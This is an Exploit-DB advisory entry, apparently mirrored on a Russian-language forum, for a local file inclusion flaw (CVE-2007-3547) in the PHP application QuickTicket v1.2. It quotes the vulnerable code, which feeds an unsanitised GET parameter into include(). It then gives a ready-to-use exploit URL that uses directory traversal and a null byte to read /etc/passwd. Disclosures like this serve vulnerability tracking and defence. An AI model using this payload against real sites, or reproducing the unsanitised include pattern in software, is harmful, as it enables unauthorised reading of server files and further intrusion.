- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4116
- Проверка EDB
-
- Пройдено
- Автор
- KATATAFISH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3547
- Дата публикации
- 2007-06-27
Код:
###QuickTicket v1.2 Local File Inclusion###
#download: http://www.qt-cute.org/download/qti12.zip
#found by: katatafish ([email protected])
#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");
#exploit:
http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
#thanks:str0ke
# milw0rm.com [2007-06-27]
- Источник
- www.exploit-db.com